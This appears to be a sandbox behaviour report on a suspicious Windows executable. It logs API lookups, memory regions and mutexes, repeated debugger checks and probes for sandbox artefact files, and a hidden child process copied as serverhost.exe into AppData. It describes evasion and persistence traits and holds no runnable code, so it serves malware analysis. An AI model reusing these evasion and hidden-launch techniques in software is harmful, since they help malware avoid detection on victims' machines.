Load KERNEL32.dll base_address = 0x76590000 True 2
Fn
Load ntdll.dll base_address = 0x772a0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Fn
Load winhttp.dll base_address = 0x71a10000 True 7
Fn
Load urlmon.dll base_address = 0x76f00000 True 8
Fn
Load wininet.dll base_address = 0x77040000 True 8
Fn
Load advapi32.dll base_address = 0x764f0000 True 1
Fn
Load ole32.dll base_address = 0x77140000 True 1
Fn
Load shell32.dll base_address = 0x758a0000 True 1
Fn
Load crypt32.dll base_address = 0x755b0000 True 1
Fn
Load userenv.dll base_address = 0x74af0000 True 1
Fn
Load wtsapi32.dll base_address = 0x74180000 True 1
Fn
Get Handle c:\users\bgc6u8~1\appdata\local\temp\42753.exe base_address = 0x400000 True 1
Fn
Get Filename c:\users\bgc6u8~1\appdata\local\temp\42753.exe process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 260 True 2
Fn
Get Address c:\windows\system32\user32.dll function = GetMessagePos, address_out = 0x768c6703 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = VirtualAlloc, address_out = 0x765e2fb6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x765d3ea8 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCommandLineA, address_out = 0x765e98ff True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = LoadLibraryA, address_out = 0x765e395c True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = cos, address_out = 0x772e7400 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = sin, address_out = 0x772d41c0 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Fn
Create Mapping C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
+
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (8)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 2
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Get Time type = Ticks, time = 85270 True 1
Fn
Get Time type = Ticks, time = 86284 True 1
Fn
Get Time type = Ticks, time = 87282 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 2
Fn
Mutex (4)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MACA73F0A True 1
Fn
Create mutex_name = Global\I78B95E2E True 1
Fn
Create mutex_name = Global\M78B95E2E True 1
Fn
Release mutex_name = Global\I78B95E2E True 1
Fn
Debug (499)
+
Operation Process Additional Information Success Count Logfile
Check for Presence c:\users\bgc6u8~1\appdata\local\temp\42753.exe True 499
Fn
Process #5: serverhost.exe
(Host: 566, Network: 0)
+
Information Value
ID #5
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:54, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:31
OS Process Information
+
Information Value
PID 0xaf8
Parent PID 0xae4 (c:\users\bgc6u8~1\appdata\local\temp\42753.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AFC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True True False
private_0x00000000001c0000 0x001c0000 0x001d1fff Private Memory Readable, Writable True True False
private_0x00000000001e0000 0x001e0000 0x001ecfff Private Memory Readable, Writable, Executable True True False
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory Readable, Writable True True False
private_0x00000000002f0000 0x002f0000 0x003affff Private Memory Readable, Writable True True False
private_0x00000000003b0000 0x003b0000 0x003bcfff Private Memory Readable, Writable True True False
42753.exe 0x00400000 0x00419fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x004e7fff Pagefile Backed Memory Readable True False False
private_0x0000000000560000 0x00560000 0x0056ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000570000 0x00570000 0x00670fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000680000 0x00680000 0x0127ffff Pagefile Backed Memory Readable True False False
private_0x00000000013e0000 0x013e0000 0x013effff Private Memory Readable, Writable True True False
sortdefault.nls 0x013f0000 0x016befff Memory Mapped File Readable False False False
esent.dll 0x5f9f0000 0x5fb92fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (2)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0xb04, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Fn
Module (59)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Fn
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Fn
Load KERNEL32.dll base_address = 0x76590000 True 2
Fn
Load ntdll.dll base_address = 0x772a0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Fn
Load winhttp.dll base_address = 0x71a10000 True 7
Fn
Load urlmon.dll base_address = 0x76f00000 True 7
Fn
Load wininet.dll base_address = 0x77040000 True 7
Fn
Get Handle c:\users\bgc6u8~1\appdata\local\temp\42753.exe base_address = 0x400000 True 1
Fn
Get Filename c:\users\bgc6u8~1\appdata\local\temp\42753.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetMessagePos, address_out = 0x768c6703 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = VirtualAlloc, address_out = 0x765e2fb6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x765d3ea8 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCommandLineA, address_out = 0x765e98ff True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = LoadLibraryA, address_out = 0x765e395c True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = cos, address_out = 0x772e7400 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = sin, address_out = 0x772d41c0 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Fn
System (3)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 1
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex (1)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MA991ED3B True 1
Fn
Debug (499)
+
Operation Process Additional Information Success Count Logfile
Check for Presence c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe True 499
Fn
Process #6: serverhost.exe
(Host: 609, Network: 11)
+
Information Value
ID #6
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:56, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:29
OS Process Information
+
Information Value
PID 0xb04
Parent PID 0xaf8 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B08
0x B0C
0x B10
0x B14
0x B1C
0x B20
0x B24
0x B2C
0x B34
0x B38
0x B3C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
private_0x00000000001b0000 0x001b0000 0x0026ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x00270fff Private Memory Readable, Writable True True False
private_0x0000000000280000 0x00280000 0x00291fff Private Memory Readable, Writable True True False
private_0x00000000002a0000 0x002a0000 0x002acfff Private Memory Readable, Writable, Executable True True False
private_0x00000000002b0000 0x002b0000 0x002bcfff Private Memory Readable, Writable True True False
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002d0000 0x002d0000 0x002dffff Private Memory Readable, Writable True True False
pagefile_0x00000000002e0000 0x002e0000 0x003a7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003c8fff Pagefile Backed Memory Readable True False False
rsaenh.dll 0x003b0000 0x003ebfff Memory Mapped File Readable False False False
private_0x00000000003b0000 0x003b0000 0x003bffff Private Memory Readable, Writable True True False
pagefile_0x00000000003b0000 0x003b0000 0x003b7fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003b1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c7fff Pagefile Backed Memory Readable, Writable True False False
windowsshell.manifest 0x003c0000 0x003c0fff Memory Mapped File Readable False False False
index.dat 0x003c0000 0x003cffff Memory Mapped File Readable, Writable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable True False False
index.dat 0x003e0000 0x003e7fff Memory Mapped File Readable, Writable True False False
index.dat 0x003f0000 0x003fffff Memory Mapped File Readable, Writable True False False
42753.exe 0x00400000 0x00419fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x00520fff Pagefile Backed Memory Readable True False False
private_0x0000000000530000 0x00530000 0x0059ffff Private Memory Readable, Writable True True False
private_0x0000000000530000 0x00530000 0x00530fff Private Memory Readable, Writable True True False
pagefile_0x0000000000530000 0x00530000 0x00530fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000540000 0x00540000 0x00540fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000550000 0x00550000 0x00550fff Pagefile Backed Memory Readable True False False
private_0x0000000000560000 0x00560000 0x0059ffff Private Memory Readable, Writable True True False
private_0x00000000005b0000 0x005b0000 0x005bffff Private Memory Readable, Writable True True False
private_0x00000000005f0000 0x005f0000 0x006effff Private Memory Readable, Writable True True False
pagefile_0x00000000006f0000 0x006f0000 0x012effff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x012f0000 0x015befff Memory Mapped File Readable False False False
private_0x00000000015c0000 0x015c0000 0x016bffff Private Memory Readable, Writable True True False
private_0x00000000016c0000 0x016c0000 0x017bffff Private Memory Readable, Writable True True False
private_0x00000000017c0000 0x017c0000 0x018bffff Private Memory Readable, Writable True True False
private_0x00000000018c0000 0x018c0000 0x019bffff Private Memory Readable, Writable True True False
private_0x00000000019c0000 0x019c0000 0x01a6ffff Private Memory Readable, Writable True True False
private_0x0000000001a70000 0x01a70000 0x01b6ffff Private Memory Readable, Writable True True False
private_0x0000000001b70000 0x01b70000 0x01d4ffff Private Memory Readable, Writable True True False
private_0x0000000001b70000 0x01b70000 0x01beffff Private Memory Readable, Writable True True False
private_0x0000000001bf0000 0x01bf0000 0x01ceffff Private Memory Readable, Writable True True False
private_0x0000000001d40000 0x01d40000 0x01d4ffff Private Memory Readable, Writable True True False
private_0x0000000001d50000 0x01d50000 0x01f4ffff Private Memory Readable, Writable True True False
private_0x0000000001d50000 0x01d50000 0x01e4ffff Private Memory Readable, Writable True True False
private_0x0000000001f40000 0x01f40000 0x01f7ffff Private Memory Readable, Writable True True False
private_0x0000000001f80000 0x01f80000 0x0207ffff Private Memory Readable, Writable True True False
private_0x0000000002080000 0x02080000 0x0217ffff Private Memory Readable, Writable True True False
private_0x0000000002180000 0x02180000 0x0227ffff Private Memory Readable, Writable True True False
private_0x0000000002280000 0x02280000 0x0237ffff Private Memory Readable, Writable True True False
esent.dll 0x5f9f0000 0x5fb92fff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x6e660000 0x6e667fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x6f800000 0x6f805fff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x6f880000 0x6f8d9fff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x72050000 0x72055fff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x72be0000 0x72bf4fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x72c00000 0x72c51fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x733b0000 0x733bcfff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x735a0000 0x735a7fff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x735b0000 0x735c1fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x735d0000 0x735dffff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc.dll 0x73f80000 0x73f91fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x73fa0000 0x73fd7fff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc6.dll 0x73ff0000 0x73ffcfff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x740e0000 0x740e6fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x740f0000 0x7410bfff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x747f0000 0x747fffff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x749d0000 0x749d4fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74c20000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74d00000 0x74d43fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74e30000 0x74e6bfff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x75270000 0x75275fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x753e0000 0x753edfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x75890000 0x75892fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76960000 0x76994fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x773e0000 0x773e5fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory Readable, Writable True True False
private_0x000000007ffd5000 0x7ffd5000 0x7ffd5fff Private Memory Readable, Writable True True False
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory Readable, Writable True True False
private_0x000000007ffd7000 0x7ffd7000 0x7ffd7fff Private Memory Readable, Writable True True False
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory Readable, Writable True True False
